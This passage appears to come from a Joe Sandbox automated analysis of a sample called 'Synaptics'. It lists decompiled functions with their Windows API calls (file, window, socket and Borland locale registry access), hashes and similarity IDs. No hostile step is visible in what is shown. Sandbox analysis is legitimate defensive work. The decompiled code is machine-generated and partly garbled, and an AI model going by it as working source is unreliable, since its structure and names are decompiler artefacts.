                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				intOrPtr* _t18;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t38;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				signed int* _t51;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                                                                            				_t51 = __ecx;
                                                                                                                                                                                                                            				_t38 = __eax;
                                                                                                                                                                                                                            				 *[fs:eax] = _t56 + 0xffffffe8;
                                                                                                                                                                                                                            				_v8 = 0x10;
                                                                                                                                                                                                                            				_t18 =  *0x49d75c; // 0x49ecd8
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t18))(__edx,  &_v24,  &_v8,  *[fs:eax], 0x47d2fa, _t56, __edi, __esi, __ebx, _t54); // executed
                                                                                                                                                                                                                            				E0047BCA8();
                                                                                                                                                                                                                            				 *_t51 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t38 + 0x7c))();
                                                                                                                                                                                                                            				E00404A14(_a8, _v28);
                                                                                                                                                                                                                            				_t29 =  *0x49d988; // 0x49ecf8
                                                                                                                                                                                                                            				 *_a4 =  *((intOrPtr*)( *_t29))(_v22) & 0x0000ffff;
                                                                                                                                                                                                                            				_pop(_t49);
                                                                                                                                                                                                                            				 *[fs:eax] = _t49;
                                                                                                                                                                                                                            				_push(0x47d301);
                                                                                                                                                                                                                            				return E004049C0( &_v28);
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • getsockname.WS2_32(?,?,00000010,00000000,0047D2FA), ref: 0047D2A5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: getsockname
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3358416759-0
                                                                                                                                                                                                                            • Opcode ID: f967102204f6f4aed3aeaf4e47652de67eb898ed1214602bbb5051f58e7d0b15
                                                                                                                                                                                                                            • Instruction ID: 8a280b85d509fd19767874a1b7a6a98121d32f32e710f6eeb76a30564a751db0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f967102204f6f4aed3aeaf4e47652de67eb898ed1214602bbb5051f58e7d0b15
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA111CB5A102099FC700DFA9D8819AAB7F8EB8D710B508576B904E3350EA349D04CBA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t20;
                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t38 = _t40;
                                                                                                                                                                                                                            				_push(_t22);
                                                                                                                                                                                                                            				_t35 = _t22;
                                                                                                                                                                                                                            				_t20 = __edx;
                                                                                                                                                                                                                            				_t32 = __eax;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					_t20 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
                                                                                                                                                                                                                            				_t43 = _t10;
                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
                                                                                                                                                                                                                            					_push(_t38);
                                                                                                                                                                                                                            					_push(0x41a890);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t40;
                                                                                                                                                                                                                            					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
                                                                                                                                                                                                                            					 *_t35 = _t15;
                                                                                                                                                                                                                            					_pop(_t30);
                                                                                                                                                                                                                            					 *[fs:eax] = _t30;
                                                                                                                                                                                                                            					_push(0x41a897);
                                                                                                                                                                                                                            					return E00403BEC(_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindResource
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1635176832-0
                                                                                                                                                                                                                            • Opcode ID: ab9e2e2e5987fb8538000ef7ea5255ae4d2481a6a9c4e282ae103432873fbd2f
                                                                                                                                                                                                                            • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab9e2e2e5987fb8538000ef7ea5255ae4d2481a6a9c4e282ae103432873fbd2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                            				struct HWND__* _t22;
                                                                                                                                                                                                                            				long _t27;
                                                                                                                                                                                                                            				CHAR* _t30;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = _t27;
                                                                                                                                                                                                                            				_t30 = __eax;
                                                                                                                                                                                                                            				_t12 = E00402C0C();
                                                                                                                                                                                                                            				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                                                                                                                                                            				E00402BFC(_t12);
                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                                            • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                                                            • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004098C4(signed int __eax, signed int __edx) {
                                                                                                                                                                                                                            				signed int _t6;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t6 = __eax | 0xffffffff;
                                                                                                                                                                                                                            				_t21 = __edx & 0x00000003;
                                                                                                                                                                                                                            				if(_t21 <= 2 && (__edx & 0x000000f0) <= 0x40) {
                                                                                                                                                                                                                            					_t14 = CreateFileA(E00404E80(__eax),  *(0x49b168 + _t21 * 4),  *(0x49b174 + ((__edx & 0x000000f0) >> 4) * 4), 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                            					return _t14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t6;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00418E54,0041DC4D,00000000,0041DCC1,?,00000000,00418E54), ref: 00409912
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                            • Opcode ID: 82fefd3b3b9ca76e2e88682aaf7516e120e0fb712907eec23904fd220d06e7c1
                                                                                                                                                                                                                            • Instruction ID: b30b33c97570f0ad182992fe68bae19e4a03d6d27b321f753603774e79905647
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82fefd3b3b9ca76e2e88682aaf7516e120e0fb712907eec23904fd220d06e7c1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77E0EDA278010422FA30A5DCACC3F5B514ED7C57A9F0A023BF594EB3D2C16C9C0192A8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040C918(long __eax, void* __edx) {
                                                                                                                                                                                                                            				char _v260;
                                                                                                                                                                                                                            				long _t6;
                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t9 = __edx;
                                                                                                                                                                                                                            				_t6 = FormatMessageA(0x3200, 0, __eax, 0,  &_v260, 0x100, 0); // executed
                                                                                                                                                                                                                            				while(_t6 > 0) {
                                                                                                                                                                                                                            					_t16 =  *((intOrPtr*)(_t18 + _t6 - 1)) - 0x21;
                                                                                                                                                                                                                            					if(_t16 < 0 || _t16 == 0xd) {
                                                                                                                                                                                                                            						_t6 = _t6 - 1;
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return E00404AB0(_t9, _t6, _t18);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00418E54,0041DC7F,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0040C937
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FormatMessage
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1306739567-0
                                                                                                                                                                                                                            • Opcode ID: 92a936b21cd9d94937c526833fb5441d460329d379bcf8ed0327f68837e686ad
                                                                                                                                                                                                                            • Instruction ID: 84e049c2e5adfe6bfcf788a8d77e6067e1cf108f27a381f6f91ce7570d17270d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92a936b21cd9d94937c526833fb5441d460329d379bcf8ed0327f68837e686ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75E0D8B178830155F22512644CC7BBA62494780704F10423636A0AA3E3DAEED44502DE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004099A0(void* __eax, long __edx, long _a4, long _a8) {
                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                            				long _t15;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v12 = _a4;
                                                                                                                                                                                                                            				_v8 = _a8;
                                                                                                                                                                                                                            				_t15 = SetFilePointer(__eax, _v12,  &_v8, __edx); // executed
                                                                                                                                                                                                                            				_v12 = _t15;
                                                                                                                                                                                                                            				return _v12;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?), ref: 004099C2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                            • Opcode ID: f29a9477991f3e7b9ebd474ae451ced9d60668962b91a1e80dbdca32ee1dd72a
                                                                                                                                                                                                                            • Instruction ID: 27054813932fb3ab48487c389183e9186cf915fff140bcd813d5bc2f2b41f103
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29a9477991f3e7b9ebd474ae451ced9d60668962b91a1e80dbdca32ee1dd72a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EE0757691521CBF9B40DED8D881DDEB7FCEB48220F204166F958E3341E631AF409795
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                            				int _t9;
                                                                                                                                                                                                                            				int _t13;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t14 = __eax;
                                                                                                                                                                                                                            				_t17 =  *0x425ac4; // 0x3
                                                                                                                                                                                                                            				E00425D3C(__eax, __ecx, _t17);
                                                                                                                                                                                                                            				 *__ecx = 0;
                                                                                                                                                                                                                            				__ecx->cy = 0;
                                                                                                                                                                                                                            				_t9 = E00404C80(__edx);
                                                                                                                                                                                                                            				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
                                                                                                                                                                                                                            				return _t13;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExtentPoint32Text
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 223599850-0
                                                                                                                                                                                                                            • Opcode ID: efb2d78b2ad38a5a788e7adebc90b34ed57604606a9e4e9179171ca3c6b050d1
                                                                                                                                                                                                                            • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efb2d78b2ad38a5a788e7adebc90b34ed57604606a9e4e9179171ca3c6b050d1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405F94(void* __eax) {
                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = __eax;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                                                                                                                                                            					_t3 = _t16 + 4; // 0x400000
                                                                                                                                                                                                                            					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                                                                                                                                                                            					_t14 = E004061D0(_t19); // executed
                                                                                                                                                                                                                            					_t18 = _t14;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                                                                                                                                                                            					if(_t18 == 0) {
                                                                                                                                                                                                                            						_t5 = _t16 + 4; // 0x400000
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t7 = _t16 + 0x10; // 0x400000
                                                                                                                                                                                                                            				return  *_t7;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                                                                                                                                                                                              • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC), ref: 00406228
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2796650324-0
                                                                                                                                                                                                                            • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                                                            • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00409946(void* __eax, long __ecx, void* __edx) {
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				_t4 = ReadFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                                                                                                                                                                                                            				if(_t4 == 0) {
                                                                                                                                                                                                                            					_v16 = 0xffffffff;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040995C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                            • Opcode ID: 0ea5086fdbfedb143330102f1be83158ca82df5f712f5050f700139e4d13b18c
                                                                                                                                                                                                                            • Instruction ID: 034859a524ad8c4371d054bc92d4e9d9950720554d01ce651a0ef640c3dbcfab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ea5086fdbfedb143330102f1be83158ca82df5f712f5050f700139e4d13b18c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4D012B23081107AE220956A5C44DB76ADCCBC9770F10063EB698D62C1E6208C018275
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00409974(void* __eax, long __ecx, void* __edx) {
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                                                                                                                                                                                                            				if(_t4 == 0) {
                                                                                                                                                                                                                            					_v16 = 0xffffffff;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                                            • Opcode ID: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                                                            • Instruction ID: 0d5b49b13c8f4389bf346f82ff244d5682fd19cf5393362de481199118583149
